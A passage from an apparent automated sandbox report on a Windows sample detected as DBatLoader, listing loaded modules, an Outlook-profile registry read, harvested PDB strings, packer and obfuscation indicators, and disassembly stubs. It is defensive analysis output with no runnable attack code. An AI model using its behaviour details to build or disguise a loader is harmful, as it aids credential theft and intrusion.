                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: C6dAUcOA6M.exeStatic file information: File size 1226752 > 1048576
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 0.2.C6dAUcOA6M.exe.2cf0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: aymtmquJ.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D0894C
                    Source: C6dAUcOA6M.exeStatic PE information: real checksum: 0x0 should be: 0x138d20
                    Source: armsvc.exe.11.drStatic PE information: real checksum: 0x32318 should be: 0x13fe9a
                    Source: Juqmtmya.PIF.8.drStatic PE information: real checksum: 0x0 should be: 0x138d20
                    Source: Trading_AIBot.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                    Source: elevation_service.exe0.13.drStatic PE information: real checksum: 0x1bb29d should be: 0x24d76e
                    Source: aymtmquJ.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                    Source: alpha.pif.5.drStatic PE information: section name: .didat
                    Source: armsvc.exe.11.drStatic PE information: section name: .didat
                    Source: alg.exe.13.drStatic PE information: section name: .didat
                    Source: FXSSVC.exe.13.drStatic PE information: section name: .didat
                    Source: elevation_service.exe.13.drStatic PE information: section name: .00cfg
                    Source: elevation_service.exe.13.drStatic PE information: section name: .gxfg
                    Source: elevation_service.exe.13.drStatic PE information: section name: .retplne
                    Source: elevation_service.exe.13.drStatic PE information: section name: _RDATA
                    Source: elevation_service.exe.13.drStatic PE information: section name: malloc_h
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .00cfg
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .gxfg
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .retplne
                    Source: elevation_service.exe0.13.drStatic PE information: section name: _RDATA
                    Source: elevation_service.exe0.13.drStatic PE information: section name: malloc_h
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D2FC push 02D1D367h; ret 0_2_02D1D35F
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF63AE push 02CF640Bh; ret 0_2_02CF6403
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF63B0 push 02CF640Bh; ret 0_2_02CF6403
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFC349 push 8B02CFC1h; ret 0_2_02CFC34E
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1C378 push 02D1C56Eh; ret 0_2_02D1C566
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF332C push eax; ret 0_2_02CF3368
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D0AC push 02D1D125h; ret 0_2_02D1D11D
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0306B push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0306C push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D1F8 push 02D1D288h; ret 0_2_02D1D280
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D144 push 02D1D1ECh; ret 0_2_02D1D1E4
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D03107 push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0F108 push ecx; mov dword ptr [esp], edx0_2_02D0F10D
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF6784 push 02CF67C6h; ret 0_2_02CF67BE
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF6782 push 02CF67C6h; ret 0_2_02CF67BE
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9748 pushfd ; iretd 0_2_02CF9757
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9758 pushfd ; iretd 0_2_02CF975F
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9760 pushfd ; iretd 0_2_02CF9763
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFD5A0 push 02CFD5CCh; ret 0_2_02CFD5C4
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1C570 push 02D1C56Eh; ret 0_2_02D1C566
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFC56C push ecx; mov dword ptr [esp], edx0_2_02CFC571
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08AD8 push 02D08B10h; ret 0_2_02D08B08
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0AAE0 push 02D0AB18h; ret 0_2_02D0AB10
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFCA4E push 02CFCD72h; ret 0_2_02CFCD6A
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFCBEC push 02CFCD72h; ret 0_2_02CFCD6A
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D64850 push eax; ret 0_2_02D64920
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0886C push 02D088AEh; ret 0_2_02D088A6
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D06946 push 02D069F3h; ret 0_2_02D069EB
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D06948 push 02D069F3h; ret 0_2_02D069EB
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0790C push 02D07989h; ret 0_2_02D07981
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D05E7C push ecx; mov dword ptr [esp], edx0_2_02D05E7E
                    Source: AppVClient.exe.13.drStatic PE information: section name: .reloc entropy: 7.936521710837491
                    Source: FXSSVC.exe.13.drStatic PE information: section name: .reloc entropy: 7.9422741099942105
                    Source: elevation_service.exe.13.drStatic PE information: section name: .reloc entropy: 7.943951723334859
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .reloc entropy: 7.945960471485194
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
